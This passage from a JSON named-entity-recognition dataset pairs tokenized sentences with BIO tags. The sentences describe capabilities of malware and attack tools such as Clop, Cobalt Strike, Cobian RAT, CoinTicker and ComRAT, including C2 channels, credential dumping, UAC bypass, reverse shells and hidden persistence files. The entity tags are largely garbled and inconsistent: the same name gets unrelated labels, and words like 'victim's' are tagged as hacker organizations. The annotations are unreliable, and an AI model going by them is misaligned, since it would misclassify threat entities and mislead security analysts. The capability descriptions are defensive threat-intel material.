"built-in", "API", "functions", "such", "as", "WNetOpenEnumW(),", "WNetEnumResourceW(),", "WNetCloseEnum(),", "GetProcAddress(),", "and", "VirtualAlloc()." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Clop", "can", "enumerate", "network", "shares." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "enumerate", "all", "processes", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "search", "for", "processes", "with", "antivirus", "and", "antimalware", "product", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "kill", "several", "processes", "and", "services", "related", "to", "backups", "and", "security", "solutions." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "has", "been", "packed", "to", "help", "avoid", "detection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "has", "checked", "the", "keyboard", "language", "using", "the", "GetKeyboardLayout()", "function", "to", "avoid", "installation", "on", "Russian-language", "or", "other", "Commonwealth", "of", "Independent", "States-language", "machines;", "it", "will", "also", "check", "the", "<code>GetTextCharset</code>", "function." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "has", "used", "the", "<code>sleep</code>", "command", "to", "avoid", "sandbox", "detection." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clop", "can", "use", "cmd.exe", "to", "help", "execute", "commands", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "variant", "of", "CloudDuke", "uses", "a", "Microsoft", "OneDrive", "account", "to", "exchange", "commands", "and", "stolen", "data", "with", "its", "operators." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "I-Tool", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CloudDuke", "downloads", "and", "executes", "additional", "malware", "from", "either", "a", "Web", "address", "or", "a", "Microsoft", "OneDrive", "account." ], "ner_tags": [ "B-Way", "B-Features", "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "variant", "of", "CloudDuke", "uses", "HTTP", "and", "HTTPS", "for", "C2." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "RSA", "asymmetric", "encryption", "with", "PKCS1", "padding", "to", "encrypt", "data", "sent", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "download", "a", "hosted", "\"beacon\"", "payload", "using", "BITSAdmin." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cobalt", "Strike", "can", "perform", "browser", "pivoting", "and", "inject", "into", "a", "user's", "browser", "to", "inherit", "cookies,", "authenticated", "HTTP", "sessions,", "and", "client", "SSL", "certificates." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "B-Way", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "a", "number", "of", "known", "techniques", "to", "bypass", "Windows", "UAC." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "self", "signed", "Java", "applets", "to", "execute", "signed", "applet", "attacks." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "a", "custom", "command", "and", "control", "protocol", "that", "can", "be", "encapsulated", "in", "DNS.", "All", "protocols", "use", "their", "standard", "assigned", "ports." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "will", "break", "large", "data", "sets", "into", "smaller", "chunks", "for", "exfiltration." ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "collect", "data", "from", "a", "local", "system." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "deobfuscate", "shellcode", "using", "a", "rolling", "XOR", "and", "decrypt", "metadata", "from", "Beacon", "sessions." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "has", "the", "ability", "to", "use", "Smart", "Applet", "attacks", "to", "disable", "the", "Java", "SecurityManager", "sandbox." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "deliver", "Beacon", "payloads", "for", "lateral", "movement", "by", "leveraging", "remote", "COM", "execution." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "determine", "if", "the", "user", "on", "an", "infected", "machine", "is", "in", "the", "admin", "or", "domain", "admin", "group." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "known", "credentials", "to", "run", "commands", "and", "spawn", "processes", "as", "a", "domain", "user", "account." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "has", "the", "ability", "to", "accept", "a", "value", "for", "HTTP", "Host", "Header", "to", "enable", "domain", "fronting." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "I-HackOrg", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "identify", "targets", "by", "querying", "account", "groups", "on", "a", "domain", "contoller." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "has", "the", "ability", "to", "load", "DLLs", "via", "reflective", "injection." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-HackOrg", "O", "I-Way", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "exploit", "Oracle", "Java", "vulnerabilities", "for", "execution,", "including", "CVE-2011-3544,", "CVE-2013-2465,", "CVE-2012-4681,", "and", "CVE-2013-2460." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "B-Exp", "O", "O", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Cobalt", "Strike", "can", "exploit", "vulnerabilities", "such", "as", "MS14-058." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cobalt", "Strike", "can", "conduct", "peer-to-peer", "communication", "over", "Windows", "named", "pipes", "encapsulated", "in", "the", "SMB", "protocol.", "All", "protocols", "use", "their", "standard", "assigned", "ports." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "explore", "files", "on", "a", "compromised", "system." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "includes", "a", "capability", "to", "modify", "the", "Beacon", "payload", "to", "eliminate", "known", "signatures", "or", "unpacking", "methods." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "deliver", "additional", "payloads", "to", "victim", "machines." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "be", "configured", "to", "have", "commands", "relayed", "over", "a", "peer-to-peer", "network", "of", "infected", "hosts.", "This", "can", "be", "used", "to", "limit", "the", "number", "of", "egress", "points,", "or", "provide", "access", "to", "a", "host", "without", "direct", "internet", "access." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Cobalt", "Strike", "System", "Profiler", "can", "use", "JavaScript", "to", "perform", "reconnaissance", "actions." ], "ner_tags": [ "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "track", "key", "presses", "with", "a", "keylogger", "module." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "spawn", "a", "job", "to", "inject", "into", "LSASS", "memory", "and", "dump", "password", "hashes." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "known", "credentials", "to", "run", "commands", "and", "spawn", "processes", "as", "a", "local", "user", "account." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "<code>net", "localgroup</code>", "to", "list", "local", "groups", "on", "a", "system." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "make", "tokens", "from", "known", "credentials." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "modify", "Registry", "values", "within", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel", "Version>\\Excel\\Security\\AccessVBOM\\</code>", "to", "enable", "the", "execution", "of", "additional", "code." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "I-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike's", "Beacon", "payload", "is", "capable", "of", "running", "shell", "commands", "without", "<code>cmd.exe</code>", "and", "PowerShell", "commands", "without", "<code>powershell.exe</code>" ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "B-SamFile" ] }, { "tokens": [ "Cobalt", "Strike", "can", "perform", "port", "scans", "from", "an", "infected", "host." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "query", "shared", "drives", "on", "the", "local", "system." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "be", "configured", "to", "use", "TCP,", "ICMP,", "and", "UDP", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "hash", "functions", "to", "obfuscate", "calls", "to", "the", "Windows", "API", "and", "use", "a", "public/private", "key", "pair", "to", "encrypt", "Beacon", "session", "metadata." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Cobalt", "Strike", "has", "the", "ability", "to", "use", "an", "Excel", "Workbook", "to", "execute", "additional", "code", "by", "enabling", "Office", "to", "trust", "macros", "and", "execute", "code", "without", "user", "permission." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "spawn", "processes", "with", "alternate", "PPIDs." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "perform", "pass", "the", "hash." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "execute", "a", "payload", "on", "a", "remote", "host", "with", "PowerShell.", "This", "technique", "does", "not", "write", "any", "data", "to", "disk.", "Cobalt", "Strike", "can", "also", "use", "PowerSploit", "and", "other", "scripting", "frameworks", "to", "perform", "execution." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "spoof", "arguments", "in", "spawned", "processes", "that", "execute", "beacon", "commands." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike's", "Beacon", "payload", "can", "collect", "information", "on", "process", "details." ], "ner_tags": [ "B-Way", "B-Tool", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "process", "hollowing", "for", "execution." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "inject", "a", "variety", "of", "payloads", "into", "processes", "dynamically", "chosen", "by", "the", "adversary." ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "mimic", "the", "HTTP", "protocol", "for", "C2", "communication,", "while", "hiding", "the", "actual", "data", "in", "either", "an", "HTTP", "header,", "URI", "parameter,", "the", "transaction", "body,", "or", "appending", "it", "to", "the", "URI." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "uses", "a", "custom", "command", "and", "control", "protocol", "that", "is", "encapsulated", "in", "HTTP,", "HTTPS,", "or", "DNS.", "In", "addition,", "it", "conducts", "peer-to-peer", "communication", "over", "Windows", "named", "pipes", "encapsulated", "in", "the", "SMB", "protocol.", "All", "protocols", "use", "their", "standard", "assigned", "ports." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "Python", "to", "perform", "execution." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "query", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel", "Version>\\Excel\\Security\\AccessVBOM\\</code>", "to", "determine", "if", "the", "security", "setting", "for", "restricting", "default", "programmatic", "access", "is", "enabled." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike's", "<code>execute-assembly</code>", "command", "can", "run", "a", ".NET", "executable", "within", "the", "memory", "of", "a", "sacrificial", "process", "by", "loading", "the", "CLR." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Cobalt", "Strike", "can", "start", "a", "VNC-based", "remote", "desktop", "server", "and", "tunnel", "the", "connection", "through", "the", "already", "established", "C2", "channel." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "uses", "the", "native", "Windows", "Network", "Enumeration", "APIs", "to", "interrogate", "and", "discover", "targets", "in", "a", "Windows", "Active", "Directory", "network." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "O", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "`rundll32.exe`", "to", "load", "DLL", "from", "the", "command", "line." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "Window", "admin", "shares", "(C$", "and", "ADMIN$)", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "SSH", "to", "a", "remote", "service." ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "set", "its", "Beacon", "payload", "to", "reach", "out", "to", "the", "C2", "server", "on", "an", "arbitrary", "and", "random", "interval." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike's", "Beacon", "payload", "is", "capable", "of", "capturing", "screenshots." ], "ner_tags": [ "B-Way", "B-Tool", "B-Tool", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Cobalt", "Strike", "can", "recover", "hashed", "passwords." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "PsExec", "to", "execute", "a", "payload", "on", "a", "remote", "host.", "It", "can", "also", "use", "Service", "Control", "Manager", "to", "start", "new", "services." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "I-Org", "I-Org", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Cobalt", "Strike", "System", "Profiler", "can", "discover", "applications", "through", "the", "browser", "and", "identify", "the", "version", "of", "Java", "the", "target", "has." ], "ner_tags": [ "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "Base64,", "URL-safe", "Base64,", "or", "NetBIOS", "encoding", "in", "its", "C2", "traffic." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "<code>sudo</code>", "to", "run", "a", "command." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "has", "the", "ability", "to", "use", "AES-256", "symmetric", "encryption", "in", "CBC", "mode", "with", "HMAC-SHA-256", "to", "encrypt", "task", "commands", "and", "XOR", "to", "encrypt", "shell", "code", "and", "configuration", "data." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "B-Features", "O", "B-Features", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "I-Features", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "determine", "the", "NetBios", "name", "and", "the", "IP", "addresses", "of", "targets", "machines", "including", "domain", "controllers." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "produce", "a", "sessions", "report", "from", "compromised", "hosts." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "enumerate", "services", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "timestomp", "any", "files", "or", "payloads", "placed", "on", "a", "target", "machine", "to", "help", "them", "blend", "in." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Cobalt", "Strike", "can", "steal", "access", "tokens", "from", "exiting", "processes." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "VBA", "to", "perform", "execution." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "a", "custom", "command", "and", "control", "protocol", "that", "can", "be", "encapsulated", "in", "HTTP", "or", "HTTPS.", "All", "protocols", "use", "their", "standard", "assigned", "ports." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "uses", "a", "command-line", "interface", "to", "interact", "with", "systems." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "WMI", "to", "deliver", "a", "payload", "to", "a", "remote", "host." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "use", "<code>WinRM</code>", "to", "execute", "a", "payload", "on", "a", "remote", "host." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobalt", "Strike", "can", "install", "a", "new", "service." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "has", "a", "feature", "to", "perform", "voice", "recording", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "uses", "DNS", "for", "C2." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "has", "a", "feature", "to", "perform", "keylogging", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "creates", "an", "autostart", "Registry", "key", "to", "ensure", "persistence." ], "ner_tags": [ "B-Time", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "has", "a", "feature", "to", "perform", "screen", "capture." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "obfuscates", "communications", "with", "the", "C2", "server", "using", "Base64", "encoding." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "has", "a", "feature", "to", "access", "the", "webcam", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Cobian", "RAT", "can", "launch", "a", "remote", "command", "shell", "interface", "for", "executing", "commands." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "decodes", "the", "initially-downloaded", "hidden", "encoded", "file", "using", "OpenSSL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CoinTicker", "downloads", "the", "EggShell", "mach-o", "binary", "using", "curl,", "which", "does", "not", "set", "the", "quarantine", "flag." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "downloads", "the", "following", "hidden", "files", "to", "evade", "detection", "and", "maintain", "persistence:", "/private/tmp/.info.enc,", "/private/tmp/.info.py,", "/private/tmp/.server.sh,", "~/Library/LaunchAgents/.espl.plist,", "~/Library/Containers/.[random", "string]/[random", "string]." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "executes", "a", "Python", "script", "to", "download", "its", "second", "stage." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "creates", "user", "launch", "agents", "named", ".espl.plist", "and", "com.apple.[random", "string].plist", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "initially", "downloads", "a", "hidden", "encoded", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "executes", "a", "Python", "script", "to", "download", "its", "second", "stage." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "executes", "a", "bash", "script", "to", "establish", "a", "reverse", "shell." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CoinTicker", "executes", "a", "bash", "script", "to", "establish", "a", "reverse", "shell." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "can", "use", "SSL/TLS", "encryption", "for", "its", "HTTP-based", "C2", "channel.", "ComRAT", "has", "used", "public", "key", "cryptography", "with", "RSA", "and", "AES", "encrypted", "email", "attachments", "for", "its", "Gmail", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "the", "ability", "to", "use", "the", "Gmail", "web", "UI", "to", "receive", "commands", "and", "exfiltrate", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O" ] }, { "tokens": [ "ComRAT", "has", "used", "encryption", "and", "base64", "to", "obfuscate", "its", "orchestrator", "code", "in", "the", "Registry.", "ComRAT", "has", "also", "used", "encoded", "PowerShell", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "ComRAT", "samples", "have", "been", "seen", "which", "hijack", "COM", "objects", "for", "persistence", "by", "replacing", "the", "path", "to", "shell32.dll", "in", "registry", "location", 